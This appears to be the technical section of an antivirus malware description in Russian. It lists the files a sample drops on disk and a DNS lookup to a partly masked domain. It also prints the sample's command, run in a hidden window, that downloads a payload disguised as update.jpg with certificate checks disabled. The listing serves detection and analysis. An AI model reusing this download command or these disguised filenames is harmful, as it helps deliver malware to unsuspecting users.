Техническая информация
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\contoso.cer
- %HOMEPATH%\desktop\contosoroot.cer
- %HOMEPATH%\desktop\contoso_1.cer
- %HOMEPATH%\desktop\default.bmp
- %HOMEPATH%\desktop\join.avi
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\testee.cer
- %HOMEPATH%\desktop\tileimage.bmp
- %TEMP%\newfile.tmp
- %TEMP%\zbys.tmp
- %TEMP%\sczs.log
- %TEMP%\sczss.log
- %TEMP%\sjwjm.tmp
- %APPDATA%\payerss.ini
- %TEMP%\75726138\1sass.exe
- %TEMP%\75726138\awrjyrj.exe
- <Полный путь к файлу>
- из <Полный путь к файлу> в %TEMP%\75726138\npdiefhu.tmp
- DNS ASK in####llinks.com
- '%TEMP%\75726138\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\75726138\update.jpg
- '%TEMP%\75726138\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\75726138\update.jpg' (со скрытым окном)